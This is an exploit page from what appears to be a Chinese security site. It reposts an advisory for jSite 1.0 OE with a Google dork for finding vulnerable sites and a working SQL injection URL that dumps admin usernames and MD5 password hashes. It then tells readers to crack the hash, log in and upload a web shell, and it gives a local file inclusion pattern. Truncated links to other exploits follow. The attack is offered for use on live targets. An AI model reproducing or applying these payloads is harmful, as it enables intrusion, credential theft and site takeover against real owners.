建站极客
网络安全 Exploit 正文
jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
所属分类:
网络安全 / Exploit
阅读数:
114
收藏 0
赞 0
分享
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Download: http://www.sclek.com/jsite.zip
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): "Powered by jSite 1.0 OE"
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws
(0x3a,user,pass),admin/**/from/**/jsite_users/*
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
1 Week Off & I Be Back :D ;)
Admin Login Is At /admin/
U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php
-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:
www.[target].com/Script/index.php?module=[LFI]
--== ================================================================================ ==--
--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--
--== ================================================================================ ==--
Safari Quicktime #!/usr/bin/perl
#
# quickbite.pl
#
# Safari Quicktime <= 7.3 RTSP Content-Type overflow exploit
# for Mac OS X (Intel)
评论 0
收藏 0
赞 0
分享
Maian Uploader -[*] ================================================================================ [*]-
-[*] Maian Uploader <= v4.0 Insecu
评论 0
收藏 0
赞 0
分享
Maian Search -[*] ================================================================================ [*]-
-[*] Maian Search <= v1.1 Insecur
评论 0
收藏 0
赞 0
分享
Maian Weblog -[*] ================================================================================ [*]-
-[*] Maian Weblog <= v4.0 Insecu
评论 0
收藏 0
赞 0
分享
Maian Guestbook -[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insec
评论 0
收藏 0
赞 0
分享
Maian Recipe -[*] ================================================================================ [*]-
-[*] Maian Recipe <= v1.2 Insecu
评论 0
收藏 0
赞 0
分享
查看更多